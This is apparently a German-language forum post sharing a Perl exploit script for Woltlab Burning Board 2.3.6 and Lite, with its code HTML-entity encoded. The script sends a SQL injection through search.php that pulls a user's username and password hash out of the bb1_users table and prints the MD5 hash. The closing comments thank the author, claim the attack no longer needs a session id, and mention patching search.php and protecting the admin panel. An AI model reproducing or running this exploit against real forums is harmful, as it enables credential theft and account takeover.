Woltlab Burning Board 2.3.6 <= / Lite Exploit

Code:

&#036;| = 1;
print &#34;
###################################################
##
## Woltlab Burning Board 2.3.6 &#60;= / Lite Exploit 
##
###################################################
##
## Coded by 666 &#60;http&#58;//blueshisha.mutebox.net>
## Bug by trew
##
###################################################
&#092;n&#34;;

if&#40;&#036;#ARGV &#60; 0&#41;
{
    print &#34;&#91;x&#93; Usage&#58; wbbsploit.pl &#91;Target&#93; &#91;Userid&#93; &#91;Searchstring&#93;&#092;n&#34;;
    exit;
}
print &#34;&#60;~> Exploiting...&#092;n&#34;;
my &#036;url = shift;
my &#036;id = shift;
my &#036;sstring = shift;

my &#036;ua = LWP&#58;&#58;UserAgent->new;
my &#036;request = new HTTP&#58;&#58;Request&#40;'POST', 'http&#58;//'.&#036;url.'search.php'&#41;;
&#036;request->content&#40;'searchuser=&name_exactly=1&topiconly=0&showposts=0&searchdate=0&beforeafter=after&sortby=lastpost&sortorder=desc&send=send&sid=&submit=Suchen&boardids%5B%5D=1&#41;%20UNION%20SELECT%20username,password%20FROM%20bb1_users%20WHERE%20userid='.&#036;id.'/*&searchstring='.&#036;sstring.''&#41;;
&#036;request->content_type&#40;'application/x-www-form-urlencoded'&#41;;
my &#036;response = &#036;ua->request&#40;&#036;request&#41;;
my &#036;body   = &#036;response->content;
print &#34;&#60;~> Hash&#58; &#34;;
&#036;body=~/&#40;&#91;a-f0-9&#93;{32}&#41;/;
print &#036;1;
print &#34;&#092;n&#34;;

an dieser stelle danke an .666 <3

neu ist das du KEINE session id beim edit der cookies mehr ben�tigst ! bzw der exploit ist komplett neu ... but search.php fixen und htaxx vor des ACP reicht -.-

und den fix gibt es hier [Only registered and activated users can see links. Click Here To Register...]